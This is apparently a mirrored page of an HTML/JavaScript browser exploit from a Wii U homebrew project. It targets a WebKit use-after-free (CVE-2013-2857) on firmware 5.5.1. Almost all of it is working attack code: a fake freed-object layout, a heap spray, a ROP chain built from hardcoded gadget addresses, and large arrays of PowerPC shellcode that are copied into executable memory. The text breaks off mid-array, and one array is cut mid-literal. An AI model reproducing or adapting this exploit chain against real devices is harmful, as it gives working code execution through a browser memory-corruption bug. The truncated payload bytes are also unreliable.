mirror of
https://github.com/wiiu-env/JsTypeHax.git
synced 2024-11-29 13:34:13 +01:00
250 lines
102 KiB
HTML
250 lines
102 KiB
HTML
|
<!--
|
||
|
Tested on 5.5.1
|
||
|
CVE-2013-2857
|
||
|
Use after free https://bugs.chromium.org/p/chromium/issues/detail?id=240124
|
||
|
Result: Bug is present, crash
|
||
|
-->
|
||
|
<script>
|
||
|
function UaF(a)
|
||
|
{
|
||
|
//Warning, the delta was modified !
|
||
|
var delta = 0x00000000; //from 0x0 to 0x04000000 step by 0x01000000
|
||
|
var pivotAdress = 0x010ADDCC;
|
||
|
var pivotAdressAdress = 0x1BB00000; //r6
|
||
|
var payloadAdress = 0x1D000000 + delta;
|
||
|
var codegenAddress = 0x01800000;
|
||
|
var sizeWebCoreImageLoader = 0x18;
|
||
|
var sprayCount = 0x1000;
|
||
|
var _4K = 0x1000;
|
||
|
var _16K = 0x4000;
|
||
|
|
||
|
//radio is the *ONLY* type that left the freed WebCore::ImageLoader free !
|
||
|
a.type="radio";
|
||
|
|
||
|
//Allocate this new WebCore::ImageLoader over freed WebCore::
|
||
|
var ab = new ArrayBuffer(sizeWebCoreImageLoader);
|
||
|
var dv = new DataView(ab)
|
||
|
/*
|
||
|
0:000:x86> dt webkit!WebCore::ImageLoader
|
||
|
+0x000 __VFN_table : Ptr32
|
||
|
+0x004 m_client : Ptr32 WebCore::ImageLoaderClient
|
||
|
+0x008 m_image : WebCore::CachedResourceHandle<WebCore::CachedImage>
|
||
|
+0x00c m_failedLoadURL : WTF::AtomicString
|
||
|
+0x010 m_hasPendingBeforeLoadEvent : Pos 0, 1 Bit
|
||
|
+0x010 m_hasPendingLoadEvent : Pos 1, 1 Bit
|
||
|
+0x010 m_hasPendingErrorEvent : Pos 2, 1 Bit
|
||
|
+0x010 m_imageComplete : Pos 3, 1 Bit
|
||
|
+0x010 m_loadManually : Pos 4, 1 Bit
|
||
|
+0x010 m_elementIsProtected : Pos 5, 1 Bit
|
||
|
*/
|
||
|
//Register:r3 Adress:0x1AF35330-0x1AF35360
|
||
|
dv.setUint32(0x00, 0x00000000); //vtable
|
||
|
dv.setUint32(0x04, pivotAdressAdress); //m_client
|
||
|
dv.setUint32(0x08, pivotAdressAdress); //m_image
|
||
|
dv.setUint32(0x0C, 0x00000000); //m_failedLoadURL
|
||
|
dv.setUint32(0x10, 0x00000000); //m_hasPendingBeforeLoadEvent
|
||
|
dv.setUint32(0x14, 0x00000000); //padding
|
||
|
|
||
|
//Rop offset
|
||
|
{
|
||
|
ROP_POPJUMPLR_STACK12 = 0x0101cd24;
|
||
|
ROP_POPJUMPLR_STACK20 = 0x01024d88;
|
||
|
ROP_CALLFUNC = 0x01080274;
|
||
|
ROP_CALLR28_POP_R28_TO_R31 = 0x0107dd70;
|
||
|
ROP_POP_R28R29R30R31 = 0x0101d8d4;
|
||
|
ROP_POP_R27 = 0x0101cb00;
|
||
|
ROP_POP_R24_TO_R31 = 0x010204c8;
|
||
|
ROP_CALLFUNCPTR_WITHARGS_FROM_R3MEM = 0x010253c0;
|
||
|
ROP_SETR3TOR31_POP_R31 = 0x0101cc10;
|
||
|
|
||
|
ROP_memcpy = 0x01035fc8;
|
||
|
ROP_DCFlushRange = 0x01023f88;
|
||
|
ROP_ICInvalidateRange = 0x010240b0;
|
||
|
ROP_OSSwitchSecCodeGenMode = 0x010376c0;
|
||
|
ROP_OSCodegenCopy = 0x010376d8;
|
||
|
ROP_OSGetCodegenVirtAddrRange = 0x010375c0;
|
||
|
ROP_OSGetCoreId = 0x01024e8c;
|
||
|
ROP_OSGetCurrentThread = 0x01043150;
|
||
|
ROP_OSSetThreadAffinity = 0x010429dc;
|
||
|
ROP_OSYieldThread = 0x010418e4;
|
||
|
ROP_OSFatal = 0x01031618;
|
||
|
ROP_Exit = 0x0101cd80;
|
||
|
ROP_OSScreenFlipBuffersEx = 0x0103afd0;
|
||
|
ROP_OSScreenClearBufferEx = 0x0103b090;
|
||
|
ROP_OSDynLoad_Acquire = 0x0102a3b4;
|
||
|
ROP_OSDynLoad_FindExport = 0x0102b828;
|
||
|
ROP_os_snprintf = 0x0102f160;
|
||
|
}
|
||
|
|
||
|
//Rop helper
|
||
|
{
|
||
|
var ropCurrentDv = null;
|
||
|
var ropCurrentOffset = 0;
|
||
|
|
||
|
function ropchain_appendu32(val)
|
||
|
{
|
||
|
ropCurrentDv.setUint32(ropCurrentOffset, val);
|
||
|
ropCurrentOffset += 4;
|
||
|
}
|
||
|
|
||
|
function ropgen_pop_r24_to_r31(r24, r25, r26, r27, r28, r29, r30, r31)
|
||
|
{
|
||
|
ropchain_appendu32(ROP_POP_R24_TO_R31);
|
||
|
ropchain_appendu32(0x0);
|
||
|
ropchain_appendu32(0x0);
|
||
|
|
||
|
ropchain_appendu32(r24);
|
||
|
ropchain_appendu32(r25);
|
||
|
ropchain_appendu32(r26);
|
||
|
ropchain_appendu32(r27);
|
||
|
ropchain_appendu32(r28);
|
||
|
ropchain_appendu32(r29);
|
||
|
ropchain_appendu32(r30);
|
||
|
ropchain_appendu32(r31);
|
||
|
|
||
|
ropchain_appendu32(0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_callfunc(funcaddr, r3, r4, r5, r6, r28)
|
||
|
{
|
||
|
ropgen_pop_r24_to_r31(r6, r5, 0, ROP_CALLR28_POP_R28_TO_R31, funcaddr, r3, 0, r4);
|
||
|
|
||
|
ropchain_appendu32(ROP_CALLFUNC);
|
||
|
|
||
|
ropchain_appendu32(r28);//r28
|
||
|
ropchain_appendu32(0x0);//r29
|
||
|
ropchain_appendu32(0x0);//r30
|
||
|
ropchain_appendu32(0x0);//r31
|
||
|
ropchain_appendu32(0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_switchto_core1()
|
||
|
{
|
||
|
ropgen_callfunc(ROP_OSGetCurrentThread, 0x0, 0x2, 0x0, 0x0, ROP_OSSetThreadAffinity);//Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
|
||
|
|
||
|
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);//ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
|
||
|
|
||
|
ropchain_appendu32(ROP_OSYieldThread);//r28
|
||
|
ropchain_appendu32(0x0);//r29
|
||
|
ropchain_appendu32(0x0);//r30
|
||
|
ropchain_appendu32(0x0);//r31
|
||
|
ropchain_appendu32(0x0);
|
||
|
|
||
|
ropchain_appendu32(ROP_CALLR28_POP_R28_TO_R31);
|
||
|
|
||
|
ropchain_appendu32(0x0);//r28
|
||
|
ropchain_appendu32(0x0);//r29
|
||
|
ropchain_appendu32(0x0);//r30
|
||
|
ropchain_appendu32(0x0);//r31
|
||
|
ropchain_appendu32(0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_OSSwitchSecCodeGenMode(flag)//flag0 == RW- permissions, flag1 == R-X permissions.
|
||
|
{
|
||
|
ropgen_callfunc(ROP_OSSwitchSecCodeGenMode, flag, 0x0, 0x0, 0x0, 0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_memcpy(dst, src, size)
|
||
|
{
|
||
|
ropgen_callfunc(ROP_memcpy, dst, src, size, 0x0, 0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_DCFlushRange(addr, size)
|
||
|
{
|
||
|
ropgen_callfunc(ROP_DCFlushRange, addr, size, 0x0, 0x0, 0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_ICInvalidateRange(addr, size)
|
||
|
{
|
||
|
ropgen_callfunc(ROP_ICInvalidateRange, addr, size, 0x0, 0x0, 0x0);
|
||
|
}
|
||
|
|
||
|
function ropgen_copycodebin_to_codegen(codegen_addr, codebin_addr, codebin_size)
|
||
|
{
|
||
|
ropgen_OSSwitchSecCodeGenMode(0);
|
||
|
ropgen_memcpy(codegen_addr, codebin_addr, codebin_size);
|
||
|
ropgen_OSSwitchSecCodeGenMode(1);
|
||
|
|
||
|
ropgen_DCFlushRange(codegen_addr, codebin_size);
|
||
|
ropgen_ICInvalidateRange(codegen_addr, codebin_size);
|
||
|
}
|
||
|
}
|
||
|
|
||
|
//Spray large ArrayBuffer with pivotAdress
|
||
|
//Middle range 0x1B100000
|
||
|
var ar = new Array(0x1800);
|
||
|
for(var i=0; i<0x1800; i++){
|
||
|
ar[i] = new DataView(new ArrayBuffer(_4K));
|
||
|
for(var j=0; j<_4K; j+=4){
|
||
|
ar[i].setUint32(j, 0x10000000+j); //filler
|
||
|
}
|
||
|
|
||
|
ar[i].setUint32(0x204, 0x0);
|
||
|
ar[i].setUint32(0x018, pivotAdressAdress);
|
||
|
ar[i].setUint32(0x000, pivotAdressAdress+0x20);
|
||
|
ar[i].setUint32(0x2BC, pivotAdress); //lwz r0, 0x4(r11) ; mtlr r0 ; mr r1, r11 ; li r3, -0x1 ; blr ;
|
||
|
//r11, new stack location
|
||
|
ar[i].setUint32(0x208, pivotAdressAdress+0x300);
|
||
|
|
||
|
//initialize this Rop Chain
|
||
|
ropCurrentDv = ar[i];
|
||
|
ropCurrentOffset = 0x304;
|
||
|
|
||
|
//start of the Rop Chain
|
||
|
|
||
|
//switch to core1
|
||
|
ropgen_switchto_core1();
|
||
|
|
||
|
//copy to payload to codegen
|
||
|
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K) //16K is too much, but ok
|
||
|
|
||
|
//prepare payload argument
|
||
|
payload_srcaddr = payloadAdress;
|
||
|
ROPHEAP = payload_srcaddr + 0x800000;
|
||
|
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
|
||
|
|
||
|
//Jump on the payload
|
||
|
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
|
||
|
|
||
|
//Setup the code-loading ROP-chain which can be used by the loader-payload, since the above one isn't usable after execution due to being corrupted.
|
||
|
ropchain_appendu32(0x0);
|
||
|
ropgen_copycodebin_to_codegen(codegenAddress, payloadAdress, _16K)//16K is too much, but ok
|
||
|
ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);
|
||
|
ropchain_appendu32(codegenAddress);//Jump to the codegen area where the payload was written.
|
||
|
}
|
||
|
|
||
|
|
||
|
//final payload to be executed by the miniloader
|
||
|
//Must be between 1B000000 and 1D000000, this is OK
|
||
|
var finalPayload = new Uint8Array(
|
||
|
[
|
||
|
0x4C, 0x4F, 0x4F, 0x4B, 0x48, 0x45, 0x52, 0x45, //magic
|
||
|
0x00, 0x40, 0x00, 0x00, //size
|
||
|
//binary of hbl code550.bin
|
||
|
0x3c, 0x20, 0x1a, 0xb5, 0x60, 0x21, 0xd1, 0x38, 0x48, 0x00, 0x14, 0x09, 0x38, 0x00, 0x25, 0x00, 0x44, 0x00, 0x00, 0x02, 0x4e, 0x80, 0x00, 0x20, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xf0, 0x93, 0xc1, 0x00, 0x04, 0x93, 0xe1, 0x00, 0x08, 0x7c, 0x05, 0x03, 0x78, 0x7c, 0x26, 0x0b, 0x78, 0x38, 0x00, 0x36, 0x00, 0x44, 0x00, 0x00, 0x02, 0x60, 0x00, 0x00, 0x00, 0x7c, 0xa0, 0x2b, 0x78, 0x7c, 0xc1, 0x33, 0x78, 0x83, 0xc1, 0x00, 0x04, 0x83, 0xe1, 0x00, 0x08, 0x38, 0x21, 0x00, 0x10, 0x7c, 0x08, 0x03, 0xa6, 0x4e, 0x80, 0x00, 0x20, 0x7f, 0xd8, 0x82, 0xa6, 0x7f, 0xf9, 0x82, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x24, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x30, 0x80, 0x90, 0x83, 0x00, 0x00, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0x12, 0x90, 0x83, 0x00, 0x04, 0x3c, 0x80, 0x7c, 0xf1, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x08, 0x3c, 0x80, 0x3c, 0xe0, 0x60, 0x84, 0x00, 0x80, 0x90, 0x83, 0x00, 0x0c, 0x3c, 0x80, 0x60, 0xe7, 0x60, 0x84, 0x00, 0xff, 0x90, 0x83, 0x00, 0x10, 0x3c, 0x80, 0x7c, 0xf0, 0x60, 0x84, 0x8b, 0xa6, 0x90, 0x83, 0x00, 0x14, 0x3c, 0x80, 0x7c, 0x00, 0x60, 0x84, 0x06, 0xac, 0x90, 0x83, 0x00, 0x18, 0x3c, 0x80, 0x4c, 0x00, 0x60, 0x84, 0x01, 0x2c, 0x90, 0x83, 0x00, 0x1c, 0x3c, 0x80, 0x7c, 0xe8, 0x60, 0x84, 0x02, 0xa6, 0x90, 0x83, 0x00, 0x20, 0x3c, 0x80, 0x48, 0x80, 0x60, 0x84, 0x00, 0x03, 0x90, 0x83, 0x00, 0x24, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x20, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd6, 0x40, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x04, 0xac, 0x3c, 0x60, 0x30, 0x80, 0x60, 0x63, 0x00, 0x12, 0x7c, 0x71, 0x8b, 0xa6, 0x3c, 0x60, 0x00, 0x80, 0x60, 0x63, 0x00, 0xff, 0x7c, 0x70, 0x8b, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0x6c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x6b, 0xf8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf0, 0x60, 0x63, 0x03, 0xcc, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x0c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd7, 0x28, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xf1, 0x60, 0x63, 0xd8, 0x2c, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x02, 0x7c, 0x78, 0x83, 0xa6, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x00, 0x32, 0x7c, 0x79, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x3c, 0x80, 0x60, 0x00, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc4, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x3c, 0x60, 0xff, 0xee, 0x60, 0x63, 0x11, 0xc8, 0x90, 0x83, 0x00, 0x00, 0x7c, 0x00, 0x18, 0xac, 0x7c, 0x00, 0x1f, 0xac, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x7f, 0xd8, 0x83, 0xa6, 0x7f, 0xf9, 0x83, 0xa6, 0x7c, 0x00, 0x06, 0xac, 0x4c, 0x00, 0x01, 0x2c, 0x4c, 0x00, 0x00, 0x64, 0x7c, 0x08, 0x02, 0xa6, 0x94, 0x21, 0xff, 0xe0, 0x3d, 0x20, 0x01, 0x02, 0x3c, 0xa0, 0x01, 0x80, 0x61, 0x29, 0xb8, 0x28, 0x93, 0xe1, 0x00, 0x1c, 0x90, 0x01, 0x00, 0x24, 0x7c, 0x9f, 0x23, 0x78, 0x38, 0xa5, 0x1c, 0x6c, 0x38, 0x80, 0x00, 0x00, 0x38, 0xc1, 0x00, 0x08, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x2f, 0x9f, 0x00, 0x00, 0x41, 0x9e, 0x00, 0x18, 0x81, 0x21, 0x00, 0x08, 0x3b, 0xff, 0xff, 0xff, 0x7d, 0x29, 0x03, 0xa6, 0x4e, 0x80, 0x04, 0x21, 0x4b, 0xff, 0xff, 0xe8, 0x39, 0x61, 0x00, 0x20, 0x48, 0x00, 0x19, 0x1c,
|
||
|
]
|
||
|
);
|
||
|
|
||
|
//Spray mini loader payload 4K
|
||
|
//Middle range payloadAdress
|
||
|
//Must be between 1D000000 and 1E000000 must be at payloadAdress, this is OK !
|
||
|
var ar2 = new Array(sprayCount*4);
|
||
|
for(var i=0; i<sprayCount*4; i++){
|
||
|
ar2[i] = new Uint8Array(
|
||
|
//from codebin2js.py
|
||
|
[
|
||
|
0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0x00, 0x60, 0x00, 0x0
|
||
|
0x3c, 0xe0, 0x1b, 0x00, 0x3d, 0x00, 0x1d, 0x00, 0x3d, 0x20, 0x4c, 0x4f, 0x61, 0x29, 0x4f, 0x4b, 0x3d, 0x40, 0x48, 0x45, 0x61, 0x4a, 0x52, 0x45, 0x81, 0x67, 0x00, 0x00, 0x7c, 0x0b, 0x48, 0x00, 0x40, 0x82, 0x00, 0x10, 0x81, 0x67, 0x00, 0x04, 0x7c, 0x0b, 0x50, 0x00, 0x41, 0x82, 0x00, 0x14, 0x38, 0xe7, 0x00, 0x04, 0x7c, 0x07, 0x40, 0x00, 0x40, 0x80, 0x01, 0xc0, 0x4b, 0xff, 0xff, 0xdc, 0x81, 0x67, 0x00, 0x08, 0x38, 0xe7, 0x00, 0x0c, 0x39, 0x40, 0x00, 0x00, 0x91, 0x41, 0x00, 0x00, 0x91, 0x41, 0x00, 0x08, 0x91, 0x41, 0x00, 0x0c, 0x91, 0x41, 0x00, 0x10, 0x91, 0x41, 0x00, 0x14, 0x91, 0x41, 0x00, 0x18, 0x91, 0x41, 0x00, 0x24, 0x91, 0x41, 0x00, 0x28, 0x91, 0x41, 0x00, 0x2c, 0x91, 0x41, 0x00, 0x30, 0x91, 0x41, 0x00, 0x38, 0x91, 0x41, 0x00, 0x3c, 0x91, 0x41, 0x00, 0x40, 0x91, 0x41, 0x00, 0x44, 0x91, 0x41, 0x00, 0x48, 0x91, 0x41, 0x00, 0x50, 0x91, 0x41, 0x00, 0x54, 0x91, 0x41, 0x00, 0x58, 0x91, 0x41, 0x00, 0x60, 0x91, 0x41, 0x00, 0x70, 0x91, 0x41, 0x00, 0x78, 0x91, 0x41, 0x00, 0x80, 0x91, 0x41, 0x00, 0x84, 0x91, 0x41, 0x00, 0x88, 0x91, 0x41, 0x00, 0x8c, 0x91, 0x41, 0x00, 0x90, 0x91, 0x41, 0x00, 0x98, 0x91, 0x41, 0x00, 0x9c, 0x91, 0x41, 0x00, 0xa0, 0x91, 0x41, 0x00, 0xa4, 0x91, 0x41, 0x00, 0xa8, 0x91, 0x41, 0x00, 0xb8, 0x91, 0x41, 0x00, 0xbc, 0x91, 0x41, 0x00, 0xc0, 0x91, 0x41, 0x00, 0xc8, 0x91, 0x41, 0x00, 0xcc, 0x91, 0x41, 0x00, 0xd0, 0x91, 0x41, 0x00, 0xd4, 0x91, 0x41, 0x00, 0xd8, 0x91, 0x41, 0x00, 0xe0, 0x91, 0x41, 0x00, 0xe4, 0x91, 0x41, 0x00, 0xe8, 0x91, 0x41, 0x00, 0xec, 0x91, 0x41, 0x00, 0xf0, 0x91, 0x41, 0x01, 0x00, 0x91, 0x41, 0x01, 0x08, 0x91, 0x41, 0x01, 0x10, 0x91, 0x41, 0x01, 0x14, 0x91, 0x41, 0x01, 0x18, 0x91, 0x41, 0x01, 0x1c, 0x91, 0x41, 0x01, 0x20, 0x91, 0x41, 0x01, 0x28, 0x91, 0x41, 0x01, 0x2c, 0x91, 0x41, 0x01, 0x30, 0x91, 0x41, 0x01, 0x34, 0x91, 0x41, 0x01, 0x38, 0x91, 0x41, 0x01, 0x48, 0x91, 0x41, 0x01, 0x50, 0x91, 0x41, 0x01, 0x58, 0x39, 0x40, 0x00, 0x01, 0x91, 0x41, 0x00, 0xb4, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x04, 0xc8, 0x91, 0x41, 0x00, 0x04, 0x91, 0x41, 0x00, 0x4c, 0x91, 0x41, 0x00, 0x94, 0x91, 0x41, 0x00, 0xdc, 0x91, 0x41, 0x01, 0x24, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x3f, 0x88, 0x91, 0x41, 0x00, 0xf8, 0x3d, 0x40, 0x01, 0x02, 0x61, 0x4a, 0x40, 0xb0, 0x91, 0x41, 0x01, 0x40, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x5f, 0xc8, 0x91, 0x41, 0x00, 0x68, 0x3d, 0x40, 0x01, 0x03, 0x61, 0x4a, 0x76, 0xc0, 0x91, 0x41, 0x00, 0x20, 0x91, 0x41, 0x00, 0xb0, 0x3d, 0x40, 0x01, 0x07, 0x61, 0x4a, 0xdd, 0x70, 0x91, 0x41, 0x00, 0x1c, 0x91, 0x41, 0x00, 0x64, 0x91, 0x41, 0x00, 0xac, 0x91, 0x41, 0x00, 0xf4, 0x91, 0x41, 0x01, 0x3c, 0x3d, 0x40, 0x01, 0x08, 0x61, 0x4a, 0x02, 0x74, 0x91, 0x41, 0x00, 0x34, 0x91, 0x41, 